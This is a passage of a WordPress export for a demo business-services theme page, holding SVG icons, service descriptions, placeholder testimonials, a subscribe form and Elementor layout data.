<g>
<g>
<circle cx="119.779" cy="148.639" r="10"></circle>
</g>
</g>
<g>
<g>
<circle cx="119.779" cy="189.409" r="10"></circle>
</g>
</g>
<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/">Project Management</a></h5>
We are working in the format of an outsourcing project office. We assume operational coordination.

<a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/" class="link-details"> Learn More</a>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve"></svg>
<g>
<g>
		<path d="M436.275,39.807H304.797C300.155,17.119,280.039,0,256,0s-44.156,17.119-48.798,39.807H75.725    c-14.771,0-26.789,12.018-26.789,26.789V351.16c0,14.771,12.017,26.789,26.789,26.789H200.63l-40.566,120.866    c-1.757,5.235,1.063,10.904,6.299,12.662c1.055,0.354,2.128,0.522,3.183,0.522c4.179,0,8.076-2.641,9.479-6.821l42.702-127.229    h68.546l42.702,127.229c1.403,4.181,5.3,6.821,9.479,6.821c1.055,0,2.128-0.169,3.183-0.522c5.236-1.758,8.056-7.427,6.299-12.662    l-40.566-120.866h124.905c14.771,0,26.789-12.018,26.789-26.789V66.596C463.063,51.824,451.046,39.807,436.275,39.807z M256,20    c12.93,0,23.963,8.274,28.082,19.807h-56.163C232.038,28.274,243.071,20,256,20z M443.063,351.16c0,3.743-3.045,6.789-6.789,6.789    h-26.121v-142.56c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10V357.95H359.39V245.979c0-5.522-4.477-10-10-10    c-5.523,0-10,4.478-10,10v111.97h-28.084v-79.255c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v79.255h-25.308V253.277    c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v104.672h-29.037v-55.023c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v55.023    h-23.221v-50.985c0-5.522-4.477-10-10-10s-10,4.478-10,10v50.985h-26.777v-39.337c0-5.522-4.477-10-10-10s-10,4.478-10,10v39.337    h-31.24c-3.743,0-6.789-3.046-6.789-6.789V66.596c0-3.743,3.045-6.789,6.789-6.789h140.468h79.614h140.468    c3.743,0,6.789,3.046,6.789,6.789V351.16z"></path>
	</g>
</g>
<g>
<g>
		<path d="M410.105,106.884c-0.013-0.137-0.039-0.269-0.058-0.404c-0.026-0.188-0.049-0.377-0.086-0.564    c-0.031-0.158-0.075-0.312-0.114-0.467c-0.04-0.161-0.076-0.323-0.124-0.482c-0.046-0.153-0.104-0.301-0.158-0.451    c-0.056-0.158-0.109-0.317-0.173-0.473c-0.058-0.139-0.125-0.272-0.189-0.407c-0.075-0.161-0.147-0.323-0.231-0.48    c-0.068-0.127-0.146-0.249-0.22-0.373c-0.093-0.156-0.181-0.314-0.283-0.466c-0.089-0.134-0.19-0.259-0.285-0.388    c-0.098-0.133-0.191-0.268-0.297-0.397c-0.179-0.218-0.37-0.425-0.567-0.627c-0.033-0.033-0.06-0.07-0.093-0.103    c-0.032-0.032-0.068-0.059-0.1-0.09c-0.203-0.198-0.412-0.39-0.631-0.57c-0.122-0.1-0.25-0.188-0.376-0.281    c-0.136-0.102-0.269-0.207-0.41-0.302c-0.144-0.096-0.293-0.179-0.44-0.267c-0.133-0.08-0.264-0.163-0.401-0.237    c-0.146-0.078-0.296-0.144-0.445-0.214c-0.147-0.07-0.292-0.143-0.444-0.206c-0.141-0.058-0.285-0.105-0.427-0.156    c-0.166-0.06-0.329-0.123-0.499-0.174c-0.139-0.042-0.279-0.072-0.419-0.108c-0.176-0.045-0.35-0.094-0.53-0.129    c-0.156-0.031-0.314-0.049-0.471-0.072c-0.166-0.025-0.329-0.055-0.497-0.072c-0.267-0.026-0.535-0.036-0.804-0.041    c-0.06-0.001-0.118-0.009-0.178-0.009h-43.197c-5.523,0-10,4.478-10,10s4.477,10,10,10h19.054l-83.028,83.028l-21.797-21.798    c-1.875-1.875-4.419-2.929-7.071-2.929s-5.196,1.054-7.071,2.929l-72.161,72.162l-21.543-21.543    c-3.905-3.904-10.237-3.904-14.142,0l-36.492,36.492c-3.905,3.905-3.905,10.237,0,14.143c1.953,1.952,4.512,2.929,7.071,2.929    c2.559,0,5.119-0.977,7.071-2.929l29.42-29.421l21.543,21.542c3.905,3.904,10.237,3.904,14.142,0l72.161-72.161l21.797,21.798    c1.875,1.875,4.419,2.929,7.071,2.929s5.196-1.054,7.071-2.929l90.099-90.099v19.054c0,5.522,4.477,10,10,10    c5.523,0,10-4.478,10-10v-43.191C410.155,107.546,410.138,107.214,410.105,106.884z"></path>
	</g>
</g>
<g>
<g>
<circle cx="119.779" cy="107.869" r="10"></circle>
</g>
</g>
<g>
<g>
<circle cx="119.779" cy="148.639" r="10"></circle>
</g>
</g>
<g>
<g>
<circle cx="119.779" cy="189.409" r="10"></circle>
</g>
</g>
<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/">Project Management</a></h5>
We are working in the format of an outsourcing project office. We assume operational coordination.

<a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/" class="link-details"> Learn More</a>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve"></svg>
<g>
<g>
		<path d="M509.07,194.061L414.3,99.29c-3.906-3.905-10.24-3.906-14.148,0c-3.906,3.906-3.906,10.24,0,14.148l87.697,87.696    l-51.274,51.273c-1.571,1.57-4.126,1.57-5.695,0l-101.25-101.249c-1.571-1.57-1.571-4.125,0-5.696l34.411-34.413    c3.906-3.906,3.906-10.24,0-14.147c-3.907-3.906-10.239-3.906-14.148,0l-34.411,34.411c-7.128,7.129-8.818,17.655-5.1,26.412    l-11.638,11.638h-44.877h-3.537h-32.955l-14.682-14.682c0.564-2.058,0.862-4.201,0.862-6.392c0-6.42-2.501-12.456-7.04-16.995    l-33.481-33.481c-3.907-3.906-10.239-3.906-14.148,0c-3.906,3.906-3.906,10.24,0,14.148l33.482,33.481    c1.026,1.026,1.18,2.225,1.18,2.847s-0.153,1.821-1.181,2.848l-2.786,2.786l-98.495,98.471c-0.032,0.032-0.059,0.067-0.09,0.099    c-0.998,0.923-2.128,1.073-2.727,1.073c-0.623,0-1.822-0.153-2.848-1.179L24.15,201.114l88.876-88.875    c3.906-3.906,3.906-10.24,0-14.147s-10.238-3.906-14.148,0L2.93,194.041c-3.906,3.906-3.906,10.24,0,14.147l58.346,58.347    c4.687,4.686,10.841,7.028,16.995,7.028c2.826,0,5.646-0.518,8.329-1.507l32.843,32.843c-2.55,4.784-4,10.237-4,16.025    c0,18.853,15.338,34.191,34.191,34.191c0.042,0,0.084-0.003,0.126-0.003c0,0.002,0,0.004,0,0.006    c0,18.811,15.269,34.119,34.064,34.188c0,0.015-0.001,0.029-0.001,0.044c0,18.853,15.338,34.191,34.191,34.191    c5.8,0,11.265-1.456,16.055-4.015l12.227,12.227c5.732,5.732,13.354,8.889,21.46,8.889c8.107,0,15.729-3.157,21.46-8.889    c5.427-5.427,8.546-12.548,8.862-20.171c7.393-0.368,14.678-3.368,20.311-9.002c5.952-5.952,9.166-13.866,9.051-22.282    c0-0.018-0.001-0.035-0.001-0.053c8.703-0.54,16.71-4.354,22.63-10.805c5.951-6.482,8.896-14.656,8.87-22.81    c8.37-0.241,16.201-3.613,22.146-9.559c6.202-6.201,9.603-14.447,9.573-23.218c-0.017-5.164-1.229-10.132-3.49-14.608l32.81-30    c4.115,2.876,8.927,4.335,13.749,4.335c6.154,0,12.309-2.343,16.995-7.027l58.346-58.347    C512.976,204.301,512.976,197.967,509.07,194.061z M149.635,335.11c-7.822,0-14.185-6.363-14.185-14.185    c0-7.821,6.363-14.184,14.185-14.184c7.822,0,14.185,6.363,14.185,14.184C163.819,328.747,157.456,335.11,149.635,335.11z     M194.516,364.551c-0.407,0.386-0.804,0.781-1.192,1.186c-2.503,2.212-5.779,3.567-9.373,3.567    c-7.821,0-14.184-6.363-14.184-14.185s6.362-14.185,14.184-14.185s14.185,6.363,14.185,14.185    C198.135,358.743,196.758,362.042,194.516,364.551z M228.18,399.225c-0.046,0.044-0.095,0.082-0.14,0.127    c-0.05,0.05-0.091,0.104-0.139,0.154c-2.557,2.491-6.043,4.032-9.885,4.032c-7.823-0.002-14.186-6.365-14.186-14.186    c0-3.623,1.376-6.922,3.619-9.431c0.407-0.386,0.804-0.781,1.192-1.186c2.502-2.212,5.779-3.566,9.373-3.566    c7.821,0,14.185,6.363,14.185,14.185C232.199,393.19,230.663,396.669,228.18,399.225z M366.94,322.927    c-2.395,2.394-5.577,3.712-8.963,3.712s-6.568-1.318-8.963-3.711l-20.782-20.783c-3.906-3.906-10.238-3.906-14.148,0    c-3.906,3.906-3.906,10.24,0,14.147l20.781,20.782c0.001,0,0.002,0.001,0.002,0.001l0.063,0.063    c5.157,5.156,5.333,13.402,0.401,18.774c-2.478,2.7-5.859,4.257-9.522,4.385c-3.655,0.135-7.145-1.188-9.805-3.707l-20.011-18.942    c-4.013-3.798-10.344-3.625-14.142,0.388c-3.798,4.012-3.625,10.343,0.387,14.142l21.787,20.625    c2.157,2.042,3.367,4.802,3.408,7.772c0.041,2.97-1.093,5.762-3.193,7.862c-4.251,4.253-11.173,4.252-15.424,0l-10.101-10.101    c-3.907-3.906-10.239-3.906-14.148,0c-1.953,1.954-2.93,4.513-2.93,7.073s0.977,5.121,2.93,7.073l10.5,10.5    c1.954,1.954,3.03,4.551,3.03,7.313s-1.076,5.36-3.03,7.313c-1.954,1.954-4.551,3.029-7.313,3.029    c-2.763,0-5.359-1.076-7.313-3.03l-12.235-12.235c2.548-4.782,3.997-10.233,3.997-16.019c0-18.811-15.27-34.119-34.065-34.188    c0-0.015,0.001-0.029,0.001-0.044c0-18.853-15.338-34.191-34.191-34.191c-0.042,0-0.083,0.003-0.125,0.003    c0-0.002,0-0.004,0-0.006c0-18.853-15.338-34.19-34.191-34.19c-5.798,0-11.261,1.455-16.049,4.012l-31.265-31.264l88.44-88.441    l15.399,15.4c1.877,1.876,4.421,2.93,7.073,2.93h12.948l-39.486,39.486c-6.037,6.037-9.361,14.065-9.361,22.603    c0,8.538,3.324,16.565,9.361,22.602c6.037,6.038,14.065,9.362,22.603,9.362s16.566-3.325,22.603-9.362l33.491-33.492l36.665,0.402    l64.825,63.967c2.422,2.39,3.762,5.58,3.772,8.982C370.665,317.322,369.346,320.52,366.94,322.927z M374.169,284.024    l-60.938-60.131c-0.001-0.001-0.002-0.002-0.003-0.003l-0.088-0.087c-2.25-2.221-5.287-3.151-8.201-2.808l-43.539-0.477    c-2.7-0.02-5.28,1.027-7.183,2.929l-36.467,36.468c-2.259,2.259-5.262,3.502-8.455,3.502s-6.196-1.243-8.455-3.502    c-2.259-2.258-3.502-5.261-3.502-8.455c0-3.194,1.243-6.197,3.502-8.456l53.633-53.633h48.416c2.653,0,5.197-1.054,7.073-2.93    l13.328-13.328l82.237,82.237L374.169,284.024z"></path>
	</g>
</g>
<g>
<g>
<circle cx="438.336" cy="205.74" r="9.983"></circle>
</g>
</g>
<g>
<g>
<circle cx="72.644" cy="206.74" r="9.983"></circle>
</g>
</g>
<g>
<g>
<circle cx="131.064" cy="82.139" r="9.983"></circle>
</g>
</g>
<g>
<g>
<circle cx="380.757" cy="81.338" r="9.983"></circle>
</g>
</g>
<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/support-function/">Support Functions</a></h5>
Integrating of innovation and public benefit into your workflows; ensuring strategic and sustainable.

<a href="http://wpdemo.archiwp.com/maxbizz/our-services/support-function/" class="link-details"> Learn More</a>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve"></svg>
<g>
<g>
		<path d="M317.5,25.324H195.706c-18.813,0-34.118,15.305-34.118,34.117v15.677c0,5.523,4.477,10,10,10s10-4.477,10-10V59.441    c0-7.784,6.333-14.117,14.118-14.117H317.5c7.785,0,14.118,6.333,14.118,14.117v15.677c0,5.523,4.477,10,10,10s10-4.477,10-10    V59.441C351.618,40.628,336.313,25.324,317.5,25.324z"></path>
	</g>
</g>
<g>
<g>
		<path d="M463.178,106.118H48.822C21.901,106.118,0,128.019,0,154.94v88.801c0,4.433,2.919,8.337,7.171,9.592l6.093,1.797v209.488    c0,12.163,9.896,22.059,22.059,22.059h441.353c12.164,0,22.059-9.896,22.059-22.059V256.603l6.039-1.744    c4.279-1.236,7.226-5.153,7.226-9.607V154.94C512,128.019,490.099,106.118,463.178,106.118z M89.235,466.676H35.323    c-1.135,0-2.058-0.923-2.058-2.058v-53.912h28.76c15.004,0,27.21,12.207,27.21,27.21V466.676z M478.734,464.618    c0.001,1.135-0.922,2.058-2.058,2.058h-53.912v-28.76c0-15.004,12.207-27.21,27.21-27.21h28.76V464.618z M478.736,390.706h-0.001    h-28.76c-26.032,0-47.21,21.179-47.21,47.21v28.76h-293.53v-28.76c0-26.032-21.179-47.21-47.21-47.21h-28.76V261.029    L209.824,313.1v32.135c0,5.523,4.477,10,10,10h72.353c5.523,0,10-4.477,10-10v-31.868l176.559-50.988V390.706z M229.823,335.235    v-29.707c0-0.028,0-0.056,0-0.083V286.5h52.353v48.735H229.823z M492,237.731L302.176,292.55V276.5c0-5.523-4.477-10-10-10    h-72.353c-5.523,0-10,4.477-10,10v15.75L20,236.265V154.94c0-15.893,12.93-28.822,28.822-28.822h40.413v34.618    c0,5.523,4.477,10,10,10s10-4.477,10-10v-34.618h289.912v34.618c0,5.523,4.477,10,10,10s10-4.477,10-10v-34.618h44.031    c15.893,0,28.822,12.93,28.822,28.822V237.731z"></path>
	</g>
</g>
<g>
<g>
<circle cx="409.15" cy="199.32" r="10"></circle>
</g>
</g>
<g>
<g>
<circle cx="99.23" cy="199.32" r="10"></circle>
</g>
</g>
<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/finance-planning/">Finance Planning</a></h5>
We identify the mission, goals and strategic priorities of a business project or non-profit organization.

<a href="http://wpdemo.archiwp.com/maxbizz/our-services/finance-planning/" class="link-details"> Learn More</a>
testimonials
<h3>What People Say About Us</h3>
<img src="https://maxbizz.s3.amazonaws.com/images/testi1.png" alt="Oliver Simson">
“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”
<h6>Oliver Simson</h6>
client of company
<img src="https://maxbizz.s3.amazonaws.com/images/testi2.png" alt="Mary Grey">
“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”
<h6>Mary Grey</h6>
Manager
<img src="https://maxbizz.s3.amazonaws.com/images/testi3.png" alt="Samanta Fox">
“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”
<h6>Samanta Fox</h6>
Designer
<h4>Ready to Get Started?</h4>
<p role="status" aria-live="polite" aria-atomic="true"></p>

<ul></ul>
<form action="/maxbizz-business/wp-admin/admin-ajax.php#wpcf7-f741-o1" method="post" novalidate="novalidate" data-status="init">
<input type="hidden" name="_wpcf7" value="741">
<input type="hidden" name="_wpcf7_version" value="5.3.2">
<input type="hidden" name="_wpcf7_locale" value="en_US">
<input type="hidden" name="_wpcf7_unit_tag" value="wpcf7-f741-o1">
<input type="hidden" name="_wpcf7_container_post" value="0">
<input type="hidden" name="_wpcf7_posted_data_hash" value="">
<input type="text" name="your-name" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Name *">
<input type="email" name="your-email" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Email *">
<button type="submit">Subscribe Now</button>
</form>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>885</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 10:16:54]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 10:16:54]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[services-with-icon]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.15]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"d5a76aa","elType":"section","settings":{"padding":{"unit":"px","top":"120","right":"0","bottom":"120","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"234f86e","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"1cf82f6","elType":"section","settings":{"structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"ce2318b","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true},{"id":"5510dd0","elType":"column","settings":{"_column_size":33,"_inline_size":57.33200000000000073896444519050419330596923828125,"_inline_size_tablet":80},"elements":[{"id":"ef1670e","elType":"widget","settings":{"sub":"Improve Your Business","title":"We Offer Great<br> Number of Finance Services","header_size":"h3","align":"center","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]}},"elements":[],"widgetType":"iheading"}],"isInner":true},{"id":"9a1cf24","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true}],"isInner":true},{"id":"063a9d3","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"72f750e","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"849b54f","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bars-chart.svg","id":648},"library":"svg"},"title":"Marketing Research","des":"Analysis of the market as a whole and its particular components (competitor, consumer, product, etc.)","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Learn More","is_border":"","icon_size":{"unit":"px","size":38,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/marketing-research\/","is_external":"","nofollow":"","custom_attributes":""},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":24,"sizes":[]},"bg_hover_des_color":"#FFFFFF"},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"c431466","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"e0e8d01","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/rocket.svg","id":649},"library":"svg"},"title":"Organizational Audit","des":"Analysis of internal processes & procedures, staff activity evaluation, evaluation of technologies.","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Learn More","is_border":"","icon_size":{"unit":"px","size":40,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/organizational-audit\/","is_external":"","nofollow":"","custom_attributes":""},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":24,"sizes":[]},"bg_hover_des_color":"#FFFFFF"},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"2269d28","elType":"column","settings":{"_column_size":33,"_inline_size":null,"hide_tablet":"hidden-tablet","hide_mobile":"hidden-phone"},"elements":[{"id":"56e56e3","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/hourglass.svg","id":650},"library":"svg"},"title":"Business Consulting","des":"Successful experience of experts in structuring investment projects, developing and implementing.","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Learn More","is_border":"","icon_size":{"unit":"px","size":38,"sizes":[]},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/business-consulting\/","is_external":"","nofollow":"","custom_attributes":""},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":24,"sizes":[]},"bg_hover_des_color":"#FFFFFF"},"elements":[],"widgetType":"iiconbox1"}],"isInner":true}],"isInner":true},{"id":"390869d","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"hide_desktop":"hidden-desktop","layout":"full_width"},"elements":[{"id":"075d0cf","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"4bdc329","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/hourglass.svg","id":650},"library":"svg"},"title":"Business Consulting","des":"Successful experience of experts in structuring investment projects, developing and implementing.","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Learn More","is_border":"","icon_size":{"unit":"px","size":38,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/business-consulting\/","is_external":"","nofollow":"","custom_attributes":""},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":24,"sizes":[]},"bg_hover_des_color":"#FFFFFF"},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"d45a6c2","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"a93d254","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart.svg","id":653},"library":"svg"},"title":"Project Management","des":"We are working in the format of an outsourcing project office. We assume operational coordination.","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Learn More","is_border":"","icon_size":{"unit":"px","size":38,"sizes":[]},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/project-management\/","is_external":"","nofollow":"","custom_attributes":""},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":24,"sizes":[]},"bg_hover_des_color":"#FFFFFF"},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"41d2371","elType":"column","settings":{"_column_size":33,"_inline_size":null,"hide_desktop":"hidden-desktop","hide_tablet":"hidden-tablet","hide_mobile":"hidden-phone"},"elements":[],"isInner":true}],"isInner":true},{"id":"a342583","elType":"section","settings":{"gap":"extended","structure":"30","background_background":"classic","layout":"full_width"},"elements":[{"id":"4685821","elType":"column","settings":{"_column_size":33,"_inline_size":null,"hide_tablet":"hidden-tablet","hide_mobile":"hidden-phone"},"elements":[{"id":"34b430f","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart.svg","id":653},"library":"svg"},"title":"Project Management","des":"We are working in the format of an outsourcing project office. We assume operational coordination.","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Learn More","is_border":"","icon_size":{"unit":"px","size":38,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/project-management\/","is_external":"","nofollow":"","custom_attributes":""},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":24,"sizes":[]},"bg_hover_des_color":"#FFFFFF"},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"793fbd6","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"ed2b68f","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/deal.svg","id":887},"library":"svg"},"title":"Support Functions","des":"Integrating of innovation and public benefit into your workflows; ensuring strategic and sustainable.","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Learn More","is_border":"","icon_size":{"unit":"px","size":48,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/support-function\/","is_external":"","nofollow":"","custom_attributes":""},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":24,"sizes":[]},"bg_hover_des_color":"#FFFFFF"},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"58be6ce","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"798624b","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/portfolio.svg","id":666},"library":"svg"},"title":"Finance Planning","des":"We identify the mission, goals and strategic priorities of a business project or non-profit organization.","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Learn More","is_border":"","icon_size":{"unit":"px","size":38,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/finance-planning\/","is_external":"","nofollow":"","custom_attributes":""},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":24,"sizes":[]},"bg_hover_des_color":"#FFFFFF"},"elements":[],"widgetType":"iiconbox1"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"e92783c","elType":"section","settings":{"background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg1-service-icon.jpg","id":1950},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"117","right":"0","bottom":"180","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"90","left":"0","isLinked":false},"padding_tablet":{"unit":"px","top":"120","right":"0","bottom":"120","left":"0","isLinked":false}},"elements":[{"id":"374524a","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"4de5108","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"35","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"f57a371","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true},{"id":"9728125","elType":"column","settings":{"_column_size":33,"_inline_size":57.33200000000000073896444519050419330596923828125,"_inline_size_tablet":80},"elements":[{"id":"00c712c","elType":"widget","settings":{"sub":"testimonials","title":"What People Say About 